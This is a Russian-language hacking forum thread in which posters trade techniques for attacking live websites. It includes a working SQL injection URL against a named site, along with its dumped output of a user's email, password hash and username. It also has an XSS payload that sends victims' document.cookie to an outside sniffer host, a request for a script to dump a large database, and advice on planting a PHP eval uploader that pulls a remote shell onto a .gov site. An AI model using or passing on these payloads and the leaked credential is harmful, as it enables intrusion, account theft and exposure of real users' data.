Сайт построен на АЯКС. Нашёл КСС-ку. Но когда пытаюсь отправить данные на сервер методом ПОСТ, то вылетает ошибка: что это может быть? mozarat, покажи свой запрос, что ты составляешь
Это ошибка браузера (там была мозилки). Вот как она выглядит в Опере: А ведь запрос такой-же вроде создаю, с единственной, пожалуй разницей - реферрер не тот. Вобщем задача - избежать ошибки, чтобы ксс выполнялась корректно
Ну наверно надо втулить коректный xml в ответе что бы небыло ошибко. А вобше аяксом(вернее XMLHttpRequest) ты не отравишь ничего на другой хост ибо политики безопасности не дадут.
так я отправлял пост-запрос на сервер не посредством XMLHttpRequest, а через простую http форму. Или так оно не примет и о xss можно забыть?
Вот. И не страница с редиректом, а страница, куда встроен javascript, который производит редирект на снифер + document.cookie А где размещен снифер (а не ядовитая ссылка на него в виде кода javascript) значения не имеет
http://www.panelmonkey.org/category.php?id=1 Здрасте всем . Што делот , немогу некак понять , если там вопше Sql ?
http://www.panelmonkey.org/background.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7--
А у тебя есть возможность изменить action? Или ты пытаешь автоформу зделать? Ну xss возможна если ты можешь встроить в страницу свой html(js) код посредством изменения каких то параметров передоваемых скрипту(грубо говоря и не вдаваясь в подробности), и если ты отправляешь форму(обычную) post на http://hacsite.ru/12.php то следуя из ошибко видно что у тебя отрпавляеться Content-type: text/xml(ну или xslt) в ответе от http://hacsite.ru/12.php но возрашаемое тело документа далеко не xml.
странно! -m0rgan- почемуто по твоему запросу мне показываеть токо вот што : sqldb was unable to successfully run a MySQL query. И на все тругие тоше самое ..
2 Saiga http://www.panelmonkey.org/background.php?id=-1/**/UNION/**/SELECT/**/1,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,email,id,password,username),0x71),0x71),3,4,5,6,7/**/FROM/**/punbb_users/**/LIMIT/**/1,1-- [email protected]:2:8d078be183b8a05eb74256465e9a507ad5c825f3:TPS Pineapple работай лимитом и всё у тебя получится
Код присутствующий на странице такой: PHP: <script>img = new Image(); img.src = "http://na-s.ru/images/mozarat_1.gif?"+document.cookie;</script> Это в .html Или еще в .js PHP: img = new Image(); img.src = "http://na-s.ru/images/mozarat_1.gif?"+document.cookie; Xss активная прописывается в сообщении. Сайт выполняет код с заданой ссылки(сайта). Ставил снииффер на lcoalhoste и сайт (двиг самописаный), и куки приходят нормальные.
Это,люди,вот такой код: require "./start.php"; require $site_dir."/include/security.php"; if ($HTTP_POST_VARS["editor_mode"] || $HTTP_GET_VARS["editor_mode"] || $HTTP_COOKIE_VARS["editor_mode"] == "editor") { func_header_location("error_message.php?access_denied&id=3"); } if (isset($editor_mode)) unset($editor_mode); x_session_register("editor_mode"); Возможна ли здесь ансет атака,даже если она ничего не даёт :Д
Народ поскажите какой небудь скриптик что бы слить базу под 50K записей. Проблема в том что чтобы добраться до sql inj надо авторизация на сайте. Без этого к данной sql inj доступа нет. Единственный вариант сливать руками через IE и LIMIT, что никак не хочется Извините если попал в offtop
всю базу со всеми колонками? Через скулю? Можно в теории, но слишком долго будет и серв может загнуться, кроме того в логах сервера столько будет гавна)))
Не делай никогда system() - это нерациоанально, делай eval(). system() не всегда работает и если magic quotes on -то ничего ты не сделаешь.... А eval дает гибкость большую - твой код всегда выполинться даже при magic quotes on (правда с финтами некоторыми =) ) Кроме того, всегда можно сделать и так -если хочешь - eval('system();') в твоем случае делай так - залий аплоадер простенький - <?php eval($_GET[id]);?> и потом юзай так site.gov/cmd.php?id=copy('http://xakersite.ru/shell.txt','shell.php');